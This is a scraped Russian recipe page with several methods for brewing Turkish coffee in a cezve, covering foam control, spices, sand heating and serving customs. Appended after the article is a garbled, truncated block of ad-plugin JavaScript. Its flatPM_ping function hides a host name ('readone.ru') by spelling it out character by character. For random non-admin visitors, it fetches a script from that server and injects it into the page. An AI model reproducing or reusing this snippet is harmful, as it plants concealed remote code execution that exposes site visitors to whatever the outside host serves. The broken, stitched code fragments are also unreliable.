Приготовления кофе по турецки рецепт

Кофе по турецки. Рецепт приготовления в турке

Турецкий рецепт кофе в турке — подробные инструкции по шагам

Этот турецкий рецепт приготовления кофе — это путеводитель, охватывающий приемлемый способ приготовления оригинального турецкого кофе.

Этот же рецепт является основой для кофе других стран.

Здесь вы будете использовать профессиональный турецкий рецепт приготовления кофе. Я подробно объясняю этот процесс. Каждый шаг дает вам всю необходимую информацию, заметки и подсказки. Если вы последуете моему совету то, нет никакого шанса потерпеть неудачу.

Некоторые варианты этого рецепта кофе в турке вы можете найти в другом месте. Будьте осторожны! Большинство из них ошибочны:

  1. Они не знают о важных деталях.
  2. Они дают запутанный способ приготовления.

Пример: вы заметите в этих рецептах, что они широко используют слово «закипит».

Если вы позволите турецкому кофе при приготовлении закипеть — вы его испортите. Идея состоит в том, чтобы нагревать содержимое и удалять без кипячения содержимого.

Пена необходима в турецком кофе. Отварите его, и вы потеряете его навсегда. Именно так вам удается поставлять лучший кофе в турке. Вы можете отличить кофе в турке от других сортов кофе — богатой пеной сверху.

Изучая, как правильно приготовить турецкий кофе в турке, вам понадобится практика. Как приготовить турецкий кофе в турке дома — избегайте кипения.

Турецкий рецепт остается неизменным с исторической эпохи. Кофе в турецком стиле — это не просто подогрев смеси с кофе-водой. Он не должен закипать, даже ни разу! Иначе вы получите горячий черный кофеин. Это НЕ правильный кофе!

Как сварить вкусный кофе в турке

1. Измельчите бобы или купите готовый молотый кофе.

2. Поместите все ингредиенты в турецкий кофейник (турку).

Ингредиенты: (на 1 чашку)

  • 1 чашка питьевой воды.
    ПРИМЕЧАНИЕ. Избегайте водопроводной воды. Его химические вещества резко меняют вкус кофе. Убедитесь, что вода комнатной температуры.
  • 1,5 чайная ложка турецкого молотого кофе. ПРИМЕЧАНИЕ: Есть ли какой-либо точный вес молотого кофе?. NO. Я видел рецепты, в которых люди говорили от 5 гр. до 10 гр. на порцию. Все зависит от вашего вкуса. Увеличьте или уменьшите количество, как вам нравится. Фактическое соотношение, которое я использую, составляет 10:1. (Для 1 чашки 2,5 унции/75 мл используйте 7,5 г турецкого молотого кофе).
  • Сахар по вашему вкусу (если нужно, обычно 1 чайная ложка).
  • Кардамон или другую пряность (если используется).

Не пытайтесь перемешать ингредиенты. Вода холодная, чтобы растворить их.

  1. Включите нагрев при средней температуре. Поставьте на него турку.

ПРИМЕЧАНИЕ. Избегайте электрических устройств. У них трудно контролировать тепло.

4. Дайте воде разогреться. Через минуту вы увидите, как кофе опускается. Опустите тепло немного больше.

ПРИМЕЧАНИЕ. Источник нагрева и количество тепла, которое вы даете турецкому кофе, являются двумя важными моментами.

5. Размешайте ингредиенты чайной ложкой (лучше всего использовать деревянную). Ваша цель — получить однородную смесь. Убедитесь, что никакие вещества с сахарным песком не плавают. Вытащите ложку и поместите ее поблизости. Не мешайте снова.

СОВЕТ: Низкое тепло + холодная вода = Более продолжительное заваривание, которое выделяет больше ароматов из молотого кофе.

6. Управление пеной. Это часть SOS. После нагревания кофе, он будет реагировать, создавая кольцо пены по краям турки. Теперь понизите тепло до минимального уровня. Вы продолжите без кипячения.

ПРИМЕЧАНИЕ. В настоящий момент вы должны уделять все внимание процессу. Кофе начнет расти медленно и очень быстро, пока кофеварение будет непрерывным. Кольцо пены будет закрываться и подниматься вверх. Это то, что мы называем «первым взлетом» турецкого кофе. СОВЕТ. Переливание кофе означает беспорядок и кофе без пены (это = НЕПРАВИЛЬНО).

7. Немедленно снимите турку с огня. Избегайте кипения! Дайте пене успокоиться в течение 15 секунд.

ПРИМЕЧАНИЕ. Кипячение разрушит вашу пену (фактически исчезнет).

8. Разделите пену и кофе в чашки. Поместите 2 чайные ложки пены в чашку. ПРИМЕЧАНИЕ. Ваша цель — дать каждому гостю равное и приличное количество пены. Это важная деталь, которую вы должны иметь в виду. В основном, если вы завариваете турецкий кофе для большого количества людей в одном горшке.

9. Теперь вы готовы закончить кофе. Верните горшок в источник нагрева. Пусть он снова нагревается и идет на «второй подъем», всегда имея в виду НЕ кипятить его. Пусть остальная пена успокоится.

ПРИМЕЧАНИЕ. Большинство рецептов турецкого кофе в Интернете требуют «третьего подъема». Если вы недостаточно опытны, избегайте этого. Это сделает вашу пену очень тонкой.

10. Налейте кофе медленно в чашку, пытаясь создать как можно больше пены наверху.

ПРИМЕЧАНИЕ. Если вы делаете 2+ чашки, вылейте кофе среди них по этапам в небольших количествах.

11. Подождите примерно 30 секунд. Пока гуща будет располагаться на дне чашки.

12. Начните наслаждаться кофе!

ПРИМЕЧАНИЕ. Кофейная гуща непригодна для питья. Вы можете использовать ее (между прочим) для … гадания!

Несколько слов о кардамоне

Кардамон — ароматическая специя, которая очень благоприятна в арабском мире. Турки используют его на умеренном уровне и в определенных регионах.

Большинство людей размалывают его в кофе. Если вы заметили что-то плавающее в вашей чашке, не беспокойтесь — это стручок кардамона, который добавляют в кофе и оставляют в чашке для дополнительного аромата.

Если вы предпочитаете «чистую» чашку, не выливайте кардамон. Оставьте его в кофейнике.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Кофе по-турецки: рецепты приготовления

Османская империя преподнесла всей планете непревзойденный подарок в виде ароматного кофе по-турецки. В культуре и образе жизни Турции этот напиток всегда играл важную роль. Да и в наши дни его значение и популярность ничуть не уменьшились. В основе турецкого гостеприимства лежит кофейная церемония. Ведь культура употребления этого напитка оказала неимоверное влияние на отношения между членами общества, на политический и социальный характер жизни, да и на сам народ. Приготовление турецкого кофе – это традиции, передающиеся из поколения в поколение. Европейцы также научились этому ремеслу, придав ему свою изюминку.

Как это делают в Турции

В самом начале кофе по-турецки готовили на горячем песке и в турке. На весь процесс уходило от 20 минут до получаса. Но это того стоило, ведь вкус и аромат напитка получался поистине изумительным и неповторимым.

Чтобы приготовить оригинальный кофе, необходимо позаботится о фарфоровых чашках и медной турке. Сам порошок также выбирают особенный. Для рецепта пригоден исключительно сорт Арабика, произрастающий в Северной и Южной Африке. Более того, покупать нужно только продукт специального мелкого помола, который так и называется: «Для кофе по-турецки». Вода выбирается исключительно очищенная и охлажденная. На одну чашку кладут пять-семь грамм порошка. Сахара же рекомендуется добавлять в соответствии с вкусовыми пристрастиями.

Читатель вправе спросить: “И насколько же сладким должен быть кофе по-турецки?” В Турции существует несколько вариантов приготовления этого напитка: вообще без сахара, чуть-чуть сладкий (на чашку кладется щепотка сахарного песка), средней сладости (пол кубика рафинада), сладкий (целый кусочек) и очень сладкий (с добавлением двух кубиков). Ниже рассмотрим парочку рецептов.

Способ номер один

Кофе по-турецки в турке готовят двумя способами. Первый из них заключается в следующих действиях: в заварочную емкость кладут одну десертную ложку молотого кофе и две такие же ложки сахара. Все это заливают кипятком. На медленном огне напиток нагревают, пока на нем не появится пенка. Когда она станет подниматься, необходимо снять с огня жидкость и на протяжении одной минуты дать ей отстоятся. Такие манипуляции проделывают пару раз. Как говорится, дважды поднять. Затем в заранее приготовленные небольшие чашечки разливают уже готовое лакомство вместе с гущей. Маленький нюанс: на родине напитка его заливают не горячей, а охлажденной водой.

Способ номер два

Чтобы кофе отдал все свои ароматические и вкусовые качества, рекомендуется смешать порошок вместе с сахарным песком, залить это холодной водой и настоять жидкость на протяжении нескольких минут. Потом турку ставят на медленный огонь и так же, как и в предыдущем рецепте, держат до появления пены. Содержимое необходимо довести до кипения, но так, чтобы оно полностью не закипело, и снять с плиты. Почти мгновенно турку опять возвращают на огонь и снова ждут, пока жидкость не закипит. Все, кофе по-турецки готов! По желанию напиток можно сбрызнуть холодной водой. Но в этом случае пенка пропадет.

И еще один рецепт

Кофе по-турецки (приготовление читайте дальше) можно сварить и с добавлением разных пряностей. Конечно, для этого потребуется немного больше времени и терпения. Итак, начнем. Насыпаем в турку две чайные ложки с горкой кофейного порошка. Добавляем сахар и заливаем смесь 100-150 граммами холодной воды – так, чтобы она доходила до самого узкого места горлышка емкости. В разогретый до 450 градусов песок или на плиту ставим посудину с жидкостью и варим все на маленьком огне. Чем дольше будем готовить напиток, тем насыщеннее будет его аромат.

Во время нагревания частички кофе и горячей воды поднимаются кверху и провоцируют появление корочки на поверхности турки. Когда состав закипает, появляется крем или пенка. И здесь наступает самый важный миг: следует уберечь напиток от «убегания».

Лишь только образовалась пенка светло-коричневого оттенка, и вы видите, что вода через несколько секунд закипит, снимайте с плиты турку и можете добавлять пряности. Здесь полагаться следует только на свой вкус. Гурманы рекомендуют приправлять бодрящий напиток ванилью, имбирем, мускатным орехом, корицей или другими пряностями.

Опять ставим турку на плиту и ждем, когда пенка начнет подниматься. Кофе готов. Если же вы любите очень крепкий напиток, то сварите его еще один раз. В готовый кофе по желанию можно добавить лимон, молоко или ликер.

И еще одно правило: переливать турецкий кофе из турки нужно обязательно в теплую и сухую чашку так, чтобы пена оставалась на поверхности.

Вода и кофе

Кофе по-турецки, рецепт которого приведен в нашей статье, пьют после еды. Также его употреблять можно отдельно от остальных продуктов. Ведь никакие яства не должны мешать наслаждаться послевкусием этого волшебного напитка. В Турции с таким кофе подают и воду в отдельных чашках. Неосведомленные туристы всегда эту жидкость оставляют напоследок, чтобы потом победить горьковатое послевкусие. Турки никогда себе такого не позволяют, ибо подобный поступок считается невероятно оскорбительным. Это значит, что приготовленное угощение невкусное, и его хочется как можно быстрее запить. Вода же подается для того, чтобы выпить ее до того момента, как вы начнете наслаждаться кофе. Она нейтрализует во рту вкус пищи, которую вы ели до этого, и ничто теперь не помешает насладиться волшебным, очаровывающим, незабываемым напитком. И пускай весь мир подождет…

Как варить турецкий кофе: рецепты в турке

Этот удивительный напиток известен с древних времён, ему поклонялись целые народы, а о его лечебных свойствах известно и в наши дни. Кофе постоянно сопровождает человека: его употребляют, когда собираются на работу; люди берут с собой, отправляясь в поездку. За время существования напитка появилось множество способов приготовления, наиболее распространённый рецепт, который дошёл до наших дней – кофе по-турецки.

Немного истории появления рецепта

Кофе в Турции пьют с 1543 года – именно тогда в страну были завезены зёрна, из которых и по сей день варят этот удивительный напиток. А спустя год в Оттоманской империи появилась первая кофейня, в которой люди проводили время за приятными беседами, наслаждаясь ароматом бодрящего напитка. С этого момента зародилась культура потребления кофе, а знаменитый рецепт приготовления распространился по всему миру.

Благодаря турецкому народу люди узнали много нового о приготовлении бодрящего напитка, его целебных свойствах и ритуалах, связанных с этим.

Набор для приготовления кофе по-турецки

Сам процесс приготовления напитка на удивление не сложен, но, чтобы он получился именно таким, как его варят в Турции, нужно немного терпения и опыт.

Выбор правильной посуды – один из самых ответственных моментов, от которого зависит дальнейшее качество напитка, его аромат и вкус. Как правило, для приготовления настоящего турецкого кофе, как его готовили в старые времена, потребуется специальная ёмкость и оборудование для песка.

Покупать профессиональный аппарат для приготовления кофе по-турецки – довольно дорого, поэтому можно обойтись специальной жаровней.

Чтобы приготовить кофе по-турецки, потребуются:

  • Кофемолка для измельчения зёрен.
  • В качестве посуды для варки напитка используют небольшой конусообразный кофейник – джезву, в идеале, из меди или серебра.
  • Многие турецкие семьи держат дома разные по объёму кофеварки (турки) – это удобно, если нужно напоить сразу несколько человек.
  • Для правильной подачи нужно приобрести набор кофейных фарфоровых чашек.

Как приготовить кофе по-турецки в домашних условиях

Процесс приготовления напитка на песке ничем не отличается от варки на плите, за исключением зрелищности.

Рецепт классического приготовления кофе по-турецки в турке

На одну порцию напитка нужно подготовить необходимые ингредиенты:

  • вода проточная 100 мл;
  • кофейный порошок 1,5 чайных ложек.
  1. Для приготовления одной порции потребуется медная кофеварка (турка) объёмом 150 мл и жаровня с песком.
  2. Жаровню с предварительно насыпанным песком ставят на плиту, чтобы она разогрелась.
  3. На дно турки насыпают кофе мелкого помола, после чего джезву закапывают в песок для прогрева.
  4. Спустя одну минуту заливают воду.
  5. После того, как смесь начнёт нагреваться, – пена начнёт подниматься. В этот момент турку вынимают из песка, дав пене опуститься. Эту операцию проделывают пару раз.
  6. По готовности кофе разливают по чашкам.

В этом рецепте очень важно не допустить кипячения напитка, иначе вкус будет горьким. Употребляют кофе по-турецки с холодной водой сразу после приготовления.

Рецепт на молоке

Для приготовления кофейного напитка потребуется:

  • молоко – 150 грамм;
  • мелкомолотый кофейный порошок – 1 чайная ложка;
  • сахар по вкусу;
  • тёртый шоколад – 1 ч. ложка.

На дно кофеварки (турки) кладут молотый кофе, сахар и заливают молоком. Приготовленную смесь ставят на медленный огонь и варят до образования пены. После этого турку снимают с огня, дав пене опуститься, через минуту процесс повторяют дважды. На этом этапе приготовление кофе на молоке заканчивается. Кофейник снимают с плиты и дают отстояться пару минут. Когда частицы осядут, можно разлить напиток по чашкам, посыпав сверху шоколадом. Употреблять напиток желательно горячим.

Ингредиенты для кофе по-турецки по специями:

  • вода проточная 150 мл;
  • молотый кофе 1,5 ложки;
  • щепотка корицы;
  • сахар 1⁄4 чайной ложки.

Турку нужно прогреть, поставив на медленный огонь, затем добавить смесь сахара и корицы.

Сахар с пряностью прогревают несколько секунд и сразу добавляют кофейный порошок и воду.

Кофеварку (турку) ставят на плиту и подогревают на слабом огне до образования пены, как и в классическом варианте. Состав периодически помешивают, чтобы растворился сахар. По окончании процесса напиток разливают по чашкам. В Турции принято пить напиток, разбавив его холодной водой.

Песок для кофе по-турецки: как выбрать и купить

Способ приготовления напитка на песке существует с древних времён, а его рецепт не меняется по сей день. Сам процесс превращается в красивый ритуал, а кофе приобретает вкусный ароматный оттенок. Приготовить кофе в домашних условиях на песке довольно сложно, но прогресс не стоит на месте: для ценителей бодрящего напитка придумали специальное оборудование.

Прибор напоминает фритюрницу, в которую насыпают песок мелкой фракции – лучше всего использовать из кварца. Аппарат работает от электросети, время приготовления напитка занимает несколько минут. Выбирать песок рекомендуется как можно мельче, кварц можно заменить морским песком, предварительно его прокалить. Купить песок для турецкого кофе можно в специализированных магазинах, морской песок найти проще (в строительных магазинах).

Кофеварка для кофе по-турецки

Существует мнение, что правильно сварить кофе по-турецки можно только в джезве. Так было до недавнего времени, пока не изобрели кофеварку: в ней напиток сохраняет те же качества, что и кофе, приготовленный по старинному рецепту.

Приготовить бодрящий напиток по-турецки в кофеварке несложно.

Всё что потребуется – вода, объём зависит от конструкции аппарата. Есть модели с двумя отсеками, рассчитанными на литр жидкости.

В специальную чашку с водой насыпают смесь кофейного порошка, сахара и специй, после чего турка с ингредиентами устанавливается в специальное гнездо.

Запускается режим варки. Через несколько минут напиток будет готов.

На рынке существует множество разных моделей для приготовления кофейного напитка, все они отличаются внешне и процессом приготовления.

  • Электрическая кофеварка (электротурка) – этот прибор довольно простой в использовании, по своей конструкции мало чем отличается от электрочайника. Устройство относится к типу многофункциональных, позволяет варить кофе, используя разные рецепты.
  • Кофемашина – не заменимое устройство в офисах и дома. В ней сразу можно готовить две порции напитка. Отличительной особенностью аппарата является датчик, контролирующий уровень пены. Это важно, так как в кофе по-турецки пена придаёт особый вкус напитку.
  • Кофеварка на песке – устройство не имеет автоматической подачи воды, способ приготовления аналогичен тому, который применяется при варке напитка по классическому рецепту. Единственное отличие – песок нагревается с помощью специального элемента.

Как пить кофе по-турецки?

В Турции во время употребления напитка не принято спешить, поэтому кофе употребляют маленькими глотками, растягивая удовольствие за приятной беседой. Обязательный атрибут кофейной трапезы – глоток холодной воды перед принятием напитка, так раскрывается его аромат.

Чашки для кофе по-турецки

Классической ёмкостью для кофе считаются небольшие чашки из турецкого фарфора объёмом 60-70 мл. Посуда поставляется из провинции Кюханья. Турки придают большое значение своему напитку. Приготовление кофе – целый ритуал, чашки – часть этого ритуала. Они прекрасно удерживают тепло на протяжении времени, пока будет употребляться напиток.

Кому рекомендуется и противопоказан

Как же трудно порой удержаться перед ароматом бодрящего напитка. Кофе обладает не только тонизирующими свойствами, но и может использоваться, как природный антиоксидант. А содержащиеся вещества способны защитить организм от заболеваний горла, зубов, так же кофе можно применять как слабительное и мочегонное средство.

Но, несмотря на все положительные качества, всё же напиток имеет ряд противопоказаний, например, его нельзя употреблять людям, страдающих гипертонией. Не желательно давать детям, беременным и кормящим грудью женщинам; страдающим заболеваниями желудка и кишечного тракта.

Как сварить кофе по турецки (видео рецепт)

Кофе по-турецки

Ингредиенты

Кофе – 2 ч.л. (с горкой)

Сахар – по желанию

Специи – по желанию

  • 21 кКал
  • 5 мин.
  • 5 мин.

Фото готового блюда

Пошаговый рецепт с фото

Кофе по-турецки — и напиток, и способ его приготовления, а также, пожалуй, один из самых знаковых и почитаемых вариантов приготовления кофе. Медная турочка, молотые кофейные зёрна и немного воды – эти три составляющие, как и способ его приготовления, неизменны на протяжении столетий.

Сегодня тысячи сортов кофейных зёрен, сотни приправ и добавок и десятки современных устройств позволяют нам готовить кофе одним лишь нажатием кнопки, но для настоящих ценителей кофе это лишь красочная мишура. И отбросив её, мы встаём с постели пораньше, чтобы не торопясь, по старинке сварить чашечку ароматного кофе по-турецки и без суеты насладиться его изысканным ароматом и вкусом.

На родине напитка говорят, что чашка хорошего кофе способна остановить время. И действительно, приготовление кофе по-турецки – завораживающий процесс. Вдыхать соблазнительный аромат, наблюдать, как на поверхности напитка медленно собирается кофейная пенка и переливаются пузырьки воздуха, – процесс сродни медитации. Наслаждаясь горьковатым и терпким вкусом свежесваренного кофе, хочется прочувствовать каждый глоток.

Итак, давайте сварим кофе по-турецки в турке…

Подготовьте ингредиенты по списку. Их немного, но от их качества многое зависит.

Кофе – предпочтительно Арабика самого тонкого помола, который сможете найти.

Вода – холодная и «мягкая». Дистиллированная или очищенная, в крайнем случае для «смягчения» обычной воды добавляют щепотку соли.

Пряности и сахар – необязательные компоненты. Добавляются, чтобы усилить аромат и смягчить вкус напитка. Наиболее популярные – кардамон, корица, гвоздика.

Кофейные зёрна измельчите или используйте готовый молотый кофе. Для получения наилучшего результата помол кофе должен быть очень тонким. Если есть выбор, отдайте предпочтение ручной, а не механической кофемолке.

В турочку отмерьте желаемое количество воды. Добавьте кофе. Классический кофе по-турецки – довольно крепкий напиток, на 1 ч.л. с горкой молотого кофе добавляется всего 55–60 мл воды, но в домашних условиях пропорции можно немного варьировать, подстраивая их под свой вкус.

Старайтесь также подбирать пропорции воды и кофе так, чтобы максимальный уровень воды был по горлышко турочки, не выше. Оставшееся свободное пространство нужно для роста кофейной пенки.

Если предпочитаете кофе с сахаром – добавьте и его.

Добавляя любые компоненты, будь то сахар, вода или специи, кофе добавляйте всегда в самую последнюю очередь и не перемешивайте напиток. Добавлять сахар уже в готовый напиток также не принято, поскольку помешивание сахара в чашке уничтожит кофейную пенку на поверхности напитка.

Теперь перейдём к самому трепетному моменту – приготовлению напитка. Считается, что самый вкусный кофе по-турецки получается, если варить кофе на песке. В домашних условиях это можно реализовать так: взять старую чугунную сковороду, выложить на дно слой мелкой гальки или камешков, и заполнить её песком. Камушки придадут песку плотность, а сам песок и толстые стенки сковороды обеспечат плавный и равномерный прогрев напитка.

Включите сильный огонь, и когда песок раскалится, установите в центр турочку с кофе.

Альтернативный вариант – готовьте кофе на самой маленькой конфорке и минимальном огне.

Медленно, но постепенно кофе начнёт закипать. Конкретные сроки назвать сложно, но у меня процесс обычно занимает 6–7 минут. В процессе нагрева на поверхности напитка образуется плотная кофейная пенка. Эту пену нельзя перемешивать – она, словно крышка, запечатывает и удерживает внутри все ароматы и вкусы.

Кофейные чашки обдайте кипятком.

Когда вода начнёт закипать, по краям пенки образуются пузырьки, и вода начнёт подниматься вверх – важно не упустить этот момент и не дать кофе закипеть, а пенке – сбежать. Снимите турочку, остановив нагрев – пенка тут же осядет. По желанию, соберите часть или всю пенку ложкой и распределите её по чашкам.

Снова верните ёмкость с кофе на горячий песок или конфорку и варите кофе ещё 20–30 секунд. За это время ещё 2 раза доведите кофе почти до кипения. Каждый раз, когда кофе начнёт закипать, останавливайте нагрев, приподнимая турочку, а затем снова его возобновляйте, возвращая её на песок.

Готовый кофе разлейте по чашкам, подождите 40-50 секунд, чтобы гуща осела, и наслаждайтесь!

Кофе по-турецки готов! Отбросьте все дела на несколько минут и насладитесь его незабываемым ароматом и вкусом!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};